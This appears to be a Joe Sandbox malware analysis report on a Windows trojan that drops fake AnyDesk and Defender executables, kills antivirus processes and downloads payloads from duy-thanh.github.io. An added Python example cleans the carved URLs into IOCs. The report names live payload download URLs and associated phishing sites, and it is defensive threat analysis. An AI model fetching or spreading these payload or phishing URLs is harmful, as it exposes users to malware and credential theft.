Command and Control: 11 Encrypted Channel; 2 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 3 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph (ID: 1521703; Sample: SecuriteInfo.com.Trojan.Win...; Startdate: 29/09/2024; Architecture: WINDOWS; Score: 76). Recoverable details from the graph image:

  • Top-level signatures: Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; AI detected suspicious sample
  • Processes started: AnyDeskUpdateService.exe; MicrosoftWindowsDefenderCoreService.exe; SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe; svchost.exe; child cmd.exe, sc.exe and conhost.exe processes
  • Network: duy-thanh.github.io (185.199.110.153, port 443, FASTLYUS, Netherlands), contacted by SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe
  • AnyDeskUpdateService.exe: Uses taskkill to terminate AV processes; Drops executables to the windows directory (C:\Windows) and starts them; Excessive usage of taskkill to terminate processes
  • MicrosoftWindowsDefenderCoreService.exe: Creates files in the system32 config directory; dropped C:\Windows\...\AnyDeskUpdateService.exe, C:\Windows\...\AnyDeskUpdateService[1].exe, C:\Windows\...\AnyDeskShellIntegration[1].dll and C:\...\AnyDeskShellIntegration_Update.dll (all PE32+)
  • SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe: dropped MicrosoftWindowsDefenderCoreService.exe, C:\Windows\...\AnyDeskCrashHandler.exe, C:\Windows\...\AnyDeskShellIntegration.dll (all PE32+) and 3 other malicious files
Source | Detection | Scanner | Label
SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | 32% | ReversingLabs | Win64.Trojan.Generic

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\MicrosoftWindowsDefenderCoreService[1].exe | 42% | ReversingLabs | Win64.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\AnyDeskShellIntegration[1].dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\AnyDeskCrashHandler[1].exe | 29% | ReversingLabs | Win64.Trojan.Generic
C:\Windows\System32\AnyDeskShellIntegration.dll | 0% | ReversingLabs |
C:\Windows\System32\AnyDeskShellIntegration_Update.dll | 0% | ReversingLabs |
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\AnyDeskShellIntegration[1].dll | 0% | ReversingLabs |
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\AnyDeskUpdateService[1].exe | 32% | ReversingLabs | Win32.Trojan.Generic
C:\Windows\System32\oobe\AnyDeskCrashHandler.exe | 29% | ReversingLabs | Win64.Trojan.Generic
C:\Windows\System32\oobe\AnyDeskUpdateService.exe | 32% | ReversingLabs | Win32.Trojan.Generic
C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | 42% | ReversingLabs | Win64.Trojan.Generic
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
duy-thanh.github.io | 185.199.110.153 | true | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://duy-thanh.github.io/file/AnyDeskCrashHandler.exe | false | | unknown
https://duy-thanh.github.io/file/AnyDeskUpdateService.exe | false | | unknown
https://duy-thanh.github.io/file/AnyDeskShellIntegration.dll | false | | unknown
https://duy-thanh.github.io/file/version.txt | false | | unknown
https://duy-thanh.github.io/file/MicrosoftWindowsDefenderCoreService.exe | false | | unknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://duy-thanh.github.io/file/AnyDeskCrashHandler.exehttps://duy-thanh.github.io/file/AnyDeskUpdaMicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3386441778.00000004C6DF9000.00000004.00000010.00020000.00000000.sdmpfalse
                unknown
                https://duy-thanh.github.io/file/version.txtDMicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2452617242.000001F7B1789000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3387008885.000001F7B178A000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.3381908245.000001F7B1789000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2516905564.000001F7B1789000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  https://duy-thanh.github.io/file/AnyDeskShellIntegration.dllgesSecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000002.2170001507.000002762097C000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    https://duy-thanh.github.io/file/MicrosoftWindowsDefenderCoreService.exepSecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000003.2163868483.0000027620A3D000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      https://duy-thanh.github.io/=RSecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000003.2163868483.0000027620A3D000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        https://duy-thanh.github.io/1SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000003.2163868483.0000027620A3D000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          https://duy-thanh.github.io/file/AnyDeskCrashHandler.exenSecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000003.2163868483.0000027620A06000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            https://duy-thanh.github.io/file/MicrosoftWindowsDefenderCoreService.exevSecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000003.2163868483.0000027620A3D000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              https://duy-thanh.github.io/file/AnyDeskCrashHandler.exedllMicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2516843651.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2821679076.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2452545323.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                https://duy-thanh.github.io/file/AnyDeskUpdateService.exe3lMicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2762015507.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2388079438.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  https://duy-thanh.github.io/file/AnyDeskUpdateService.exeC:MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3386441778.00000004C6DF9000.00000004.00000010.00020000.00000000.sdmpfalse
                                    unknown
                                    https://duy-thanh.github.io/file/version.txtb.io/file/AnyDeskCrashHandler.exeMicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.3381908245.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3387008885.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      https://duy-thanh.github.io/file/version.txtXMicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2821679076.000001F7B17AC000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2516843651.000001F7B17AD000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2381038957.000001F7B17DA000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2388079438.000001F7B17B0000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2452545323.000001F7B17AD000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.3381908245.000001F7B179E000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2881888934.000001F7B17AD000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2642623988.000001F7B17AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        https://duy-thanh.github.io/file/AnyDeskCrashHandler.exetup%lMicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.3381908245.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3387008885.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          https://duy-thanh.github.io/file/version.txt9c4a2f8b514.cdf-msMoMicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2381142881.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2388079438.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
Name: https://duy-thanh.github.io/file/AnyDeskCrashHandler.exetupz | Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2762015507.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: unknown
Name: https://duy-thanh.github.io/file/AnyDeskShellIntegration.dllz | Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3387008885.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: unknown
Name: https://duy-thanh.github.io/file/version.txtC: | Source: MicrosoftWindowsDefenderCoreService.exe, 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3386441778.00000004C6DF9000.00000004.00000010.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3387459125.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp | Malicious: false | Reputation: unknown
Name: https://duy-thanh.github.io/file/AnyDeskShellIntegration.dll(l | Source: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000003.2163868483.0000027620A06000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: unknown
Name: https://duy-thanh.github.io/file/version.txtb.io/file/version.txteService.exe3l | Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2943264967.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2881888934.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2821679076.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: unknown
Name: https://duy-thanh.github.io/file/version.txte1 | Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2381038957.000001F7B17DA000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: unknown
Name: https://duy-thanh.github.io/file/version.txt.dll | Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3386691306.000001F7B1727000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: unknown
Name: https://duy-thanh.github.io/file/AnyDeskShellIntegration.dllao | Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2381142881.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2324213769.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2253907648.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: unknown
Name: https://duy-thanh.github.io/file/AnyDeskS | Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3386441778.00000004C6DF9000.00000004.00000010.00020000.00000000.sdmp | Malicious: false | Reputation: unknown
Name: https://duy-thanh.github.io/file/AnyDeskUpdateService.exedf-msMo | Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2452545323.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: unknown
Name: https://duy-thanh.github.io/file/AnyDeskCrashHandler.execdf-ms | Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2943264967.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: unknown
Name: https://duy-thanh.github.io/file/AnyDeskUpdateService.exeml | Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3387008885.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: unknown
Name: https://duy-thanh.github.io/file/version.txt%l | Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2580698857.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: unknown
Name: https://duy-thanh.github.io/file/AnyDeskShellIntegration.dll8l | Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.3381908245.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3387008885.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2642623988.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2702146475.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: unknown
Name: https://duy-thanh.github.io/file/version.txt8Y | Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2702146475.000001F7B17AC000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: unknown
Name: https://duy-thanh.github.io/file/AnyDeskUpdateService.exeup | Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2943264967.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2881888934.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: unknown
Name: https://duy-thanh.github.io/file/version.txtb.io/file/version.txt3l | Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2381142881.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2324213769.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: unknown
Name: https://duy-thanh.github.io/file/AnyDeskShellIntegration.dllhttps://duy-thanh.github.io/file/AnyDesk | Source: AnyDeskUpdateService.exe, 00000088.00000002.2580124899.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp | Malicious: false | Reputation: unknown
Name: https://duy-thanh.github.io/file/AnyDeskShellIntegration.dllRo- | Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2381142881.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2943264967.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2324213769.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2762015507.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2253907648.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.3381908245.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2516843651.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2580698857.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3387008885.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2642623988.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2702146475.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2881888934.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2821679076.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2452545323.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2388079438.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: unknown
Name: https://duy-thanh.github.io/file/AnyDeskCrashHandler.exey | Source: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000003.2163868483.0000027620A3D000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: unknown
Name: https://duy-thanh.github.io/file/AnyDeskShellIntegration.dllmsml | Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2943264967.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: unknown
Name: https://duy-thanh.github.io/file/AnyDeskShellIntegratP | Source: AnyDeskUpdateService.exe, 00000020.00000002.3386537801.0000009561CFD000.00000004.00000010.00020000.00000000.sdmp | Malicious: false | Reputation: unknown
Name: https://duy-thanh.github.io/file/version.txtt | Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2762015507.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2516843651.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2821679076.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: unknown
Name: https://duy-thanh.github.io/ | Source: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000002.2170001507.00000276209D5000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000003.2163868483.0000027620A3D000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2381038957.000001F7B17DA000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3386691306.000001F7B1727000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: unknown
Name: https://duy-thanh.github.io/file/AnyDeskCrashHandler.exez | Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2762015507.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2642623988.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2702146475.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: unknown
Name: https://duy-thanh.github.io/file/AnyDeskShellIntegratL | Source: AnyDeskUpdateService.exe, 00000020.00000002.3385629324.0000009560FAC000.00000004.00000010.00020000.00000000.sdmp | Malicious: false | Reputation: unknown
Name: https://duy-thanh.github.io/file/version.txtr | Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2762015507.000001F7B17AD000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2324213769.000001F7B17B0000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: unknown
Name: https://duy-thanh.github.io/file/AnyDeskCrashHandler.exetup | Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2516843651.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2388079438.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.199.110.153 | duy-thanh.github.io | Netherlands | 54113 | FASTLYUS | false
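The string table above lists the same handful of payload URLs on duy-thanh.github.io many times over, each copy with the trailing bytes that happened to sit next to it in memory ("...exetupz", "...dll8l"), some truncated ("...AnyDeskShellIntegratP") and one with a second URL fused onto the first. The contacted IP is GitHub Pages behind Fastly, and the context tables further down show it serving unrelated phishing pages, so the hostname and paths are what to act on, not the IP. The following is an added example, not part of the Joe Sandbox report, showing how a practitioner would reduce such rows to clean IOCs with process attribution. The sample rows are constructed from the table above (memory-dump ids dropped); the extension allowlist, the 8-character minimum prefix used to attribute truncated strings, and the function names are this example's assumptions.

```python
"""Normalise URL strings carved from memory dumps into actionable IOCs.

Added example; not part of the Joe Sandbox report. Strings carved from
process memory carry bytes of whatever sat next to them, get truncated,
or fuse two URLs together, so the raw rows are not a usable blocklist.
"""
import re
from collections import defaultdict

# Sample input constructed from rows of the report's string table: (raw string, source process).
RAW_ROWS = [
    ("https://duy-thanh.github.io/file/AnyDeskCrashHandler.exetupz", "MicrosoftWindowsDefenderCoreService.exe"),
    ("https://duy-thanh.github.io/file/AnyDeskShellIntegration.dllz", "MicrosoftWindowsDefenderCoreService.exe"),
    ("https://duy-thanh.github.io/file/version.txtC:", "MicrosoftWindowsDefenderCoreService.exe"),
    ("https://duy-thanh.github.io/file/version.txtb.io/file/version.txteService.exe3l", "MicrosoftWindowsDefenderCoreService.exe"),
    ("https://duy-thanh.github.io/file/AnyDeskS", "MicrosoftWindowsDefenderCoreService.exe"),
    ("https://duy-thanh.github.io/file/AnyDeskUpdateService.exedf-msMo", "MicrosoftWindowsDefenderCoreService.exe"),
    ("https://duy-thanh.github.io/file/AnyDeskShellIntegration.dllhttps://duy-thanh.github.io/file/AnyDesk", "AnyDeskUpdateService.exe"),
    ("https://duy-thanh.github.io/file/AnyDeskCrashHandler.exey", "SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe"),
    ("https://duy-thanh.github.io/file/AnyDeskShellIntegratP", "AnyDeskUpdateService.exe"),
    ("https://duy-thanh.github.io/", "SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe"),
]

# Assumption: every payload path ends in one of these extensions; anything
# after the extension is adjacent memory, not part of the URL.
KNOWN_EXT = ("exe", "dll", "txt")
URL_RE = re.compile(r"^(https?)://([A-Za-z0-9.\-]+)(/[^\s\"'<>]*)?")
PATH_RE = re.compile(r"^/[A-Za-z0-9_\-./]*?\.(?:" + "|".join(KNOWN_EXT) + r")")
SAFE_PREFIX_RE = re.compile(r"^/[A-Za-z0-9_\-./]*")
MIN_PREFIX = 8  # shortest path prefix accepted when attributing a truncated string (assumption)


def split_candidates(raw):
    """Split a carved string at every scheme so a second URL fused onto the
    first ("...dllhttps://duy-thanh...") is not swallowed by the first."""
    return [p for p in re.split(r"(?=https?://)", raw) if p.startswith(("http://", "https://"))]


def carve(candidate):
    """Return (base, clean_path, partial_path); exactly one of the paths is set.
    base is scheme://host; clean_path ends in a known extension with the
    trailing memory garbage cut off; partial_path is a truncated/unknown path."""
    m = URL_RE.match(candidate)
    if not m:
        return None
    scheme, host, path = m.group(1), m.group(2), m.group(3) or "/"
    base = f"{scheme}://{host}"
    pm = PATH_RE.match(path)
    if pm:
        return base, pm.group(0), None
    return base, None, SAFE_PREFIX_RE.match(path).group(0)


def normalise(rows):
    urls = defaultdict(set)   # clean URL -> processes whose memory held it
    hosts = defaultdict(set)  # host -> processes
    partials = []             # (base, truncated path, process)
    for raw, proc in rows:
        for cand in split_candidates(raw):
            carved = carve(cand)
            if carved is None:
                continue
            base, clean, partial = carved
            hosts[base.split("://", 1)[1]].add(proc)
            if clean:
                urls[base + clean].add(proc)
            elif partial != "/":
                partials.append((base, partial, proc))
    # Attribute a truncated string to a complete URL only when a prefix of at
    # least MIN_PREFIX path characters matches exactly one known URL. Once a
    # prefix matches more than one URL, shorter prefixes cannot disambiguate.
    unresolved = []
    for base, partial, proc in partials:
        resolved = None
        for cut in range(len(partial), MIN_PREFIX - 1, -1):
            hits = [u for u in urls if u.startswith(base + partial[:cut])]
            if len(hits) == 1:
                resolved = hits[0]
                break
            if len(hits) > 1:
                break
        if resolved:
            urls[resolved].add(proc)
        else:
            unresolved.append((base + partial, proc))
    return {"urls": dict(urls), "hosts": dict(hosts), "unresolved": unresolved}


if __name__ == "__main__":
    result = normalise(RAW_ROWS)
    for url, procs in sorted(result["urls"].items()):
        print(url, "<-", ", ".join(sorted(procs)))
    for raw, proc in result["unresolved"]:
        print("unresolved:", raw, "<-", proc)
```

On the constructed rows this yields four path-level IOCs (AnyDeskCrashHandler.exe, AnyDeskShellIntegration.dll, AnyDeskUpdateService.exe and version.txt under /file/), the host duy-thanh.github.io referenced by all three processes, and one string (".../file/AnyDesk") left unresolved because three known URLs share that prefix. Prefix attribution is a heuristic for working out which process touched which URL; the blocklist itself should contain only the clean URLs and the host.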
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1521703
Start date and time: 2024-09-29 02:25:07 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 48s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes: 283
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe
Detection: MAL
Classification: mal76.evad.winEXE@545/20@1/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 55
• Number of non-executed functions: 207
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): Conhost.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big: too many NtOpenFile calls found.
• Report size getting too big: too many NtOpenKeyEx calls found.
• Report size getting too big: too many NtProtectVirtualMemory calls found.
• Report size getting too big: too many NtQueryValueKey calls found.
• Report size getting too big: too many NtWriteVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe
Time | Type | Description
20:26:47 | API Interceptor | 169422x Sleep call for process: AnyDeskCrashHandler.exe modified
20:26:51 | API Interceptor | 370x Sleep call for process: AnyDeskUpdateService.exe modified
Match: 185.199.110.153
Associated Sample Name / URL | Detection | Threat Name | Context
http://bankmallat.github.io/ | malicious | Unknown | bankmallat.github.io/
http://mallika1618.github.io/project1 | malicious | HTMLPhisher | mallika1618.github.io/project1
http://unusualactivityaccountpages12.github.io/ | malicious | HTMLPhisher | unusualactivityaccountpages12.github.io/
http://steephan2003.github.io/ | malicious | HTMLPhisher | steephan2003.github.io/
http://facebook-web-cloud.github.io/ | malicious | HTMLPhisher | facebook-web-cloud.github.io/
http://unusualmanagementaccount.github.io/ | malicious | HTMLPhisher | unusualmanagementaccount.github.io/
http://document001.github.io/ | malicious | HTMLPhisher | document001.github.io/
http://vamsirednam.github.io/Netflix | malicious | HTMLPhisher | vamsirednam.github.io/Netflix
http://sreekanthv1995.github.io/netflix_clone | malicious | HTMLPhisher | sreekanthv1995.github.io/netflix_clone
http://steveidiot.github.io/BharatIntern-WebDevelopment-HomepageOfNetflix | malicious | HTMLPhisher | steveidiot.github.io/BharatIntern-WebDevelopment-HomepageOfNetflix
No context
Match: FASTLYUS
Associated Sample Name / URL | Detection | Threat Name | Context
http://pub-ca8a3ace07094ee9967971c12a96a935.r2.dev/index.html | malicious | HTMLPhisher | 151.101.194.137
https://shahbazni.github.io/re-verify-yourself-profile/index.html | malicious | HTMLPhisher | 185.199.108.153
http://pub-5c11a91a55864f9b9bf45b1c581d6d73.r2.dev/index.html | malicious | HTMLPhisher | 185.199.108.153
http://yhusbssgsuh.wixsite.com/my-site | malicious | HTMLPhisher | 199.232.188.157
http://pub-6f594b43277e4071a0c14266387a1ea8.r2.dev/fdsaghjk.html | malicious | HTMLPhisher | 151.101.194.137
https://jesswhiteus.github.io/Awais-link/index.html | malicious | HTMLPhisher | 185.199.111.153
http://pub-39ac7434165d45eda536266ee7865b38.r2.dev/index.html | malicious | HTMLPhisher | 151.101.66.137
http://pub-350a846a0e7e4389a5b4fd3d333108f4.r2.dev/index.html | malicious | HTMLPhisher | 151.101.194.137
http://ingresar-aqui1201.weebly.com/ | malicious | Unknown | 151.101.129.49
http://cancelarpedidoaqui003.weebly.com/ | malicious | Unknown | 199.232.188.157
Match: 37f463bf4616ecd445d4a1937da06e19
